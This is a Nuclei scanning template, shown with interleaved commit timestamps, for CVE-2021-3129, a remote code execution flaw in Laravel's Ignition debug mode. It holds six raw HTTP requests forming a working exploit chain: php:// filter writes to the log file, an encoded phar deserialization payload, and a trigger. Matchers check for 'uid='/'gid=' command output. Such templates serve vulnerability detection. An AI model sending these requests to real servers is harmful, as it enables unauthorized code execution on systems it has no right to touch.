2021-02-27 12:56:57 +00:00
id : CVE-2021-3129
info :
2022-05-18 20:58:07 +00:00
name : Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution
2021-07-10 08:12:09 +00:00
author : z3bd,pdteam
2021-02-27 12:56:57 +00:00
severity : critical
2022-05-18 20:58:07 +00:00
description : Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to remote code execution, potentially allowing an attacker to take control of the affected system.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade Laravel to version 8.4.3 or higher to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
2022-05-18 20:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-3129
2022-05-18 21:10:42 +00:00
- https://github.com/facade/ignition/pull/334
2024-03-23 09:28:19 +00:00
- https://github.com/d4n-sec/d4n-sec.github.io
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-3129
2024-06-07 10:04:29 +00:00
epss-score : 0.97461
epss-percentile : 0.99957
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 6
2023-07-11 19:49:27 +00:00
vendor : facade
product : ignition
2023-09-06 12:09:01 +00:00
framework : laravel
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,laravel,rce,vulhub,kev,facade
2021-02-27 12:56:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-27 18:24:39 +00:00
- raw :
- |
POST /_ignition/execute-solution HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Content-Type : application/json
2021-07-10 08:12:09 +00:00
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log" }}
- |
POST /_ignition/execute-solution HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Content-Type : application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log" }}
- |
POST /_ignition/execute-solution HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Content-Type : application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA" }}
- |
POST /_ignition/execute-solution HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Content-Type : application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a" }}
- |
POST /_ignition/execute-solution HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Content-Type : application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log" }}
- |
POST /_ignition/execute-solution HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Content-Type : application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt" }}
matchers-condition : and
2021-02-27 12:56:57 +00:00
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-02-27 12:56:57 +00:00
words :
2021-07-10 08:12:09 +00:00
- "uid="
- "gid="
- "groups="
- "Illuminate"
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 500
2021-07-10 08:12:09 +00:00
extractors :
- type : regex
regex :
- "(u|g)id=.*"
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100aa6df3a8575f8d21cd204728e9cdb16b47126a35ff1ca16ae8fa1398841f0015022100c34c90c9f12c146abc1da92ae9fa05bbe773dcbff42ccadedba93ba6a4ea3bd8:922c64590222798bb761d5b6d8e72950